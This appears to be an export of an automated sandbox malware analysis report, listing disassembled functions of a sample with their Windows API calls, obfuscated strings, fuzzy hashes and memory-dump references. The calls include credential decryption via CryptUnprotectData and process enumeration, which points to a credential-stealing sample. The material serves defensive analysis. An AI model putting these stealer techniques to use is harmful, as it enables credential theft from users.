                        • Instruction ID: 7bd621e2958ba49e475ef58d6695690b2d426321cba211a8537260f8136bf285
                        • Opcode Fuzzy Hash: 906fd6ceab7c7098d241017961a944ba4a82738ef5be3634f973269261c81bf2
                        • Instruction Fuzzy Hash: 6AB2E3F360C2009FE704AE29EC8567AFBE5EF98320F16492DE6C5C7744EA3598418797
                        Function 008B620D Relevance: 9.1, Strings: 6, Instructions: 1584COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: *l~?$1u_o$6#<v$`}{{${V]$O{
                        • API String ID: 0-1236110375
                        • Opcode ID: 68d5de081ecc6438447934184180fc35c9cf396e21060a0f6d02f935478cf6aa
                        • Instruction ID: 2a1415e9a1e0b93c70c3c79e94c2e3f51b6ce7f86bfb3945f26d6fcb3ae4d040
                        • Opcode Fuzzy Hash: 68d5de081ecc6438447934184180fc35c9cf396e21060a0f6d02f935478cf6aa
                        • Instruction Fuzzy Hash: BFB2E6F360C6009FE304AE2DEC8567ABBE9EF94720F1A493DE6C5C7344E63598418697
                        Function 00512C10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00512C42
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00512C49
                        • GetTimeZoneInformation.KERNEL32(?), ref: 00512C58
                        • wsprintfA.USER32 ref: 00512C83
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                        • String ID: wwww
                        • API String ID: 3317088062-671953474
                        • Opcode ID: 2eab1596dbd891a754048bfa5aa6402f68fd5acc6a0d4998ae9be67d6fb93e5f
                        • Instruction ID: 509772399cea42f6e4e790dfa99ddd605b1adfc921714d00bb6de7d835236299
                        • Opcode Fuzzy Hash: 2eab1596dbd891a754048bfa5aa6402f68fd5acc6a0d4998ae9be67d6fb93e5f
                        • Instruction Fuzzy Hash: F0012B71A00604ABD7288F58DC49FADBB6DFB85721F048729FA15D77C0D774190087D5
                        Function 008A8BBF Relevance: 7.9, Strings: 5, Instructions: 1672COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Qjuk$W}m}$cs+$p?e$5|}
                        • API String ID: 0-1456871573
                        • Opcode ID: d2656a530b16c2aa199d357ca8f633fdf79e44902814746502a6e8d7ace3917d
                        • Instruction ID: 127ee64a64ec074877f3453a4dbfdda3abdf75467d4ca3c0f85675edeaea336b
                        • Opcode Fuzzy Hash: d2656a530b16c2aa199d357ca8f633fdf79e44902814746502a6e8d7ace3917d
                        • Instruction Fuzzy Hash: 47B217F3A0C2049FE3086E2DEC8577ABBE5EB94320F1A863DE6C5C3744E97558058697
                        Function 004F7750 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 004F775E
                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F7765
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004F778D
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004F77AD
                        • LocalFree.KERNEL32(?), ref: 004F77B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                        • String ID:
                        • API String ID: 2609814428-0
                        • Opcode ID: e25c89f02b8ed38b24a87e57105d127b9b769725931567dc88a2b3c26ca95e85
                        • Instruction ID: e0020180fa7968fbd2624821deb6661311ef7143e36889f2e37653309d22cf9c
                        • Opcode Fuzzy Hash: e25c89f02b8ed38b24a87e57105d127b9b769725931567dc88a2b3c26ca95e85
                        • Instruction Fuzzy Hash: C3012575B403097BEB20DB94DC4AFAA7B78FB44B15F108155FB09EB2C0D6B5A901C794
                        Function 008AC18D Relevance: 6.6, Strings: 4, Instructions: 1645COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: J];$QP}$a5_{$ausl
                        • API String ID: 0-2407705382
                        • Opcode ID: 69383e9c490cd361c59443202a7f50c782c649a49d340e802afdc3ab648999a1
                        • Instruction ID: 450e03bae0f02119912848106f7f1e46e642868e3e4e5d2ebdc89d6111eb42c6
                        • Opcode Fuzzy Hash: 69383e9c490cd361c59443202a7f50c782c649a49d340e802afdc3ab648999a1
                        • Instruction Fuzzy Hash: 4FB218F3A082049FE304AE2DEC8567AFBE9EBD4720F1A853DE6C5C3744E93558058696
                        Function 008ADCDF Relevance: 6.6, Strings: 4, Instructions: 1614COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: (:C!$9h_$g\y${/
                        • API String ID: 0-4222029071
                        • Opcode ID: e257a401b66ec379659a280a0e471bd062096ffbef2747a328f22c349e6ded7c
                        • Instruction ID: b21b681ba10805ab4fdef5d72ae48cd27db3490c3d532ecd0e310a0fb7125fc1
                        • Opcode Fuzzy Hash: e257a401b66ec379659a280a0e471bd062096ffbef2747a328f22c349e6ded7c
                        • Instruction Fuzzy Hash: 9DB217F3A0C2049FE3046E2DEC8567AB7E9EF94720F1A493DEAC5C3744EA3558058697
                        Function 008A5674 Relevance: 6.6, Strings: 4, Instructions: 1614COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 'Q;$<:|k$.q$^]~
                        • API String ID: 0-1018311729
                        • Opcode ID: cce037effa87dc7cc6c60830d3e8afc93c2991678cb2faeb58cd1bb0cd1f4780
                        • Instruction ID: 63a234f7e1ab2eb8b1252f28ccc607d4923323c9cf5fc3a45dbb1e496c029d41
                        • Opcode Fuzzy Hash: cce037effa87dc7cc6c60830d3e8afc93c2991678cb2faeb58cd1bb0cd1f4780
                        • Instruction Fuzzy Hash: 4CB205F360C2049FE304AE2DEC8567ABBE5EF94720F1A493DEAC4C3744EA3558058796
                        Function 008B4875 Relevance: 6.6, Strings: 4, Instructions: 1575COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: a-oo$i=|w$o\x~$F<
                        • API String ID: 0-2181640793
                        • Opcode ID: eee807601f0da4e87eee7972f2c1bbcb2a992f787390ebb20f9d0e0dc23c84f1
                        • Instruction ID: fefeeeb0d132cb250b1819b2620ce0d92e3f4e1df37e7676e95aec950c90c9dd
                        • Opcode Fuzzy Hash: eee807601f0da4e87eee7972f2c1bbcb2a992f787390ebb20f9d0e0dc23c84f1
                        • Instruction Fuzzy Hash: 31B2E4F360C6009FE304AE2DEC8567ABBE9EF94720F1A493DEAC4C3744E63558458796
                        Function 00513A50 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005171E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 005171FE
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00513A96
                        • Process32First.KERNEL32(00000000,00000128), ref: 00513AA9
                        • Process32Next.KERNEL32(00000000,00000128), ref: 00513ABF
                          • Part of subcall function 00517310: lstrlen.KERNEL32(------,004F5BEB), ref: 0051731B
                          • Part of subcall function 00517310: lstrcpy.KERNEL32(00000000), ref: 0051733F
                          • Part of subcall function 00517310: lstrcat.KERNEL32(?,------), ref: 00517349
                          • Part of subcall function 00517280: lstrcpy.KERNEL32(00000000), ref: 005172AE
                        • CloseHandle.KERNEL32(00000000), ref: 00513BF7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                        • String ID:
                        • API String ID: 1066202413-0
                        • Opcode ID: 87440e07ab8788aeb1d50fd106ccd176c59045ca42fe469f91355dd3e74416c2
                        • Instruction ID: c534a72b9ec12f339174c03662b7c556eae592fa1700cd5dec83f395ed34d4a5
                        • Opcode Fuzzy Hash: 87440e07ab8788aeb1d50fd106ccd176c59045ca42fe469f91355dd3e74416c2
                        • Instruction Fuzzy Hash: 78810630904209CFE724CF19D958B95BBF1FF44329F29C1A9D4089B2A2D77A9DC6CB80
                        Function 004FEA30 Relevance: 6.1, APIs: 4, Instructions: 98stringencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 004FEA76
                        • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 004FEA7E
                        • lstrcat.KERNEL32(0051CFEC,0051CFEC), ref: 004FEB27
                        • lstrcat.KERNEL32(0051CFEC,0051CFEC), ref: 004FEB49
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$BinaryCryptStringlstrlen
                        • String ID:
                        • API String ID: 189259977-0
                        • Opcode ID: e2faa7f7b229cf349d7494aa15fb200017166dd0beecc09beb1168b63b10d799
                        • Instruction ID: 9d589642341a669d6766dce901c6f4d0d9722ae38886afc56a7231332e4c1eb9
                        • Opcode Fuzzy Hash: e2faa7f7b229cf349d7494aa15fb200017166dd0beecc09beb1168b63b10d799
                        • Instruction Fuzzy Hash: B9312735A40119ABE720CB58EC45FEF7B7DAF44701F048069FA09E3240DBB55A458BA6
                        Function 005140B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 005140CD
                        • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 005140DC
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005140E3
                        • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00514113
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
